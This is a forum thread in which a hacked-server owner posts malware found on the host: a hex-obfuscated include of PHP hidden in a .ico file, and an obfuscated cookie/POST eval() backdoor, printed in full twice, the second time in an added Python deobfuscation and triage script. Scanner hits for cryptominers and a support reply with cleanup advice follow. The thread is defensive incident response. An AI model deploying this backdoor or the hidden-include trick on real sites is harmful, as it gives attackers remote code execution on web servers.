Server hacked: I found these, please advise how to deep scan and detect any vulnerabilities
1. This is in an index.php file:
<?php
/*3bd6f*/
@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";
/*3bd6f*/
================
2. Another PHP file uploaded by the hacker:
<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
===
3. This one looked like it tried to tamper with the /etc/passwd file:
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico
FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283
===
4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452
===
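Static triage of the two PHP samples in the post, as an added example (this is not code from the thread or from the support team). Sample 1 hides the include path behind \xNN escapes; sample 2 assembles its function names from indices into a scrambled alphabet, then runs eval() on data that arrives in cookies or POST fields. The decoders below are generic for those two obfuscation patterns: the variable names (`$mslckg`, `$zmkcjwn`) are read from the file, not hard-coded, so the same script works on the next sample of the same family. Function names, the `triage()` wording and the split of the samples over several lines are my own choices.

```python
"""Decode the obfuscation patterns seen in the post and list defender-facing indicators."""
import re

# Copied from the post: the @include line from the tampered index.php (sample 1).
SAMPLE_INCLUDE = r'@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";'

# Copied from the post (sample 2), split after ';' for readability; PHP ignores the line breaks.
SAMPLE_SHELL = r"""<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();
$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7]
.$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33]
.$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19]
.$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];
$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];
$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];
$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];
$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];
$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];
$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];
$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];
$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];
foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}
function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}
function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}
$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
"""


def php_single_quoted(literal: str) -> str:
    """Unescape the body of a PHP single-quoted string (only backslash-quote and double backslash are escapes)."""
    return re.sub(r"\\([\\'])", r"\1", literal)


def decode_hex_escapes(text: str) -> str:
    """Resolve PHP double-quoted \\xNN escapes to the characters they hide."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), text)


def hidden_include_paths(php: str) -> list:
    """Decoded targets of include/require whose path literal uses \\x escapes (sample 1 pattern)."""
    pat = r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*\\x(?:[^"\\]|\\.)*)"'
    return [decode_hex_escapes(m.group(1)) for m in re.finditer(pat, php)]


def decode_index_array(php: str):
    """Rebuild strings assembled as $alpha[i].$alpha[j]... (sample 2 pattern).

    Returns (array_variable_name, decoded_strings) in push order; (None, []) if absent.
    """
    m = re.search(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", php)
    if not m:
        return None, []
    alpha_var, alphabet = m.group(1), php_single_quoted(m.group(2))
    stmt = re.compile(r"\$(\w+)\[\]\s*=\s*((?:\$" + re.escape(alpha_var) + r"\[\d+\]\s*\.?\s*)+);")
    arr_var, decoded = None, []
    for s in stmt.finditer(php):
        arr_var = s.group(1)
        idx = [int(i) for i in re.findall(r"\[(\d+)\]", s.group(2))]
        decoded.append("".join(alphabet[i] for i in idx))
    return arr_var, decoded


def make_readable(php: str) -> str:
    """Replace $arr[N] references with the decoded literal so the control flow can be read."""
    arr_var, decoded = decode_index_array(php)
    if arr_var is None:
        return php

    def sub(m):
        i = int(m.group(1))
        if i >= len(decoded):
            return m.group(0)
        # Used as a call target -> bare function name; otherwise a quoted string literal.
        return decoded[i] + "(" if m.group(2) else "'" + decoded[i] + "'"

    return re.sub(r"\$" + re.escape(arr_var) + r"\[(\d+)\](\s*\()?", sub, php)


def triage(php: str) -> list:
    """Short, defender-facing reasons to quarantine a file; empty list means nothing matched."""
    hits = []
    for p in hidden_include_paths(php):
        hits.append("hex-escaped include of " + p)
        if p.endswith(".ico"):
            hits.append("include target has an image extension (PHP hidden in an .ico)")
    _, decoded = decode_index_array(php)
    if decoded:
        hits.append("function names assembled from alphabet indices: " + ", ".join(decoded))
    readable = make_readable(php)
    if "eval(" in readable and re.search(r"\$_(?:COOKIE|POST|GET|REQUEST)", readable):
        hits.append("eval() reachable from request data (cookie/POST backdoor)")
    return hits


if __name__ == "__main__":
    for name, sample in (("index.php include", SAMPLE_INCLUDE), ("uploaded file", SAMPLE_SHELL)):
        print(name)
        for h in triage(sample):
            print("  -", h)
    print(make_readable(SAMPLE_SHELL))
```

Running it shows that sample 2 resolves to `array_merge`, `pack('H*', ...)`, `explode('#', ...)` and friends around an `eval()`, i.e. a backdoor that takes hex-encoded, XOR-masked commands from any cookie or POST field, which is why restoring from backup and then checking every site for the same pattern (not just the one file maldet flagged) is the right order of work.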
- Support team
- Posts: 1096
- Joined: Sat Sep 06, 2014 9:58 pm
- Os: Debian 8x
- Web: apache + nginx
Re: Server hacked: I found these, please advise how to deep scan and detect any vulnerabilities
Well,
The information you gave is not complete... Was only one site hacked, or did you find multiple sites hacked?
It looks more like an insecure site being targeted for malware injections.
You can:
1. Restore your site from a backup and then secure it.
2. Use Clamscan or Maldet to check your site files.
Ensure you have an open_basedir restriction in place for each site so that if one is compromised, the hacker cannot crawl through the other areas of the server.
Re: Server hacked: I found these, please advise how to deep scan and detect any vulnerabilities
Thanks a lot.
I restored all users from backup,
and did a further scan and fixed some more issues.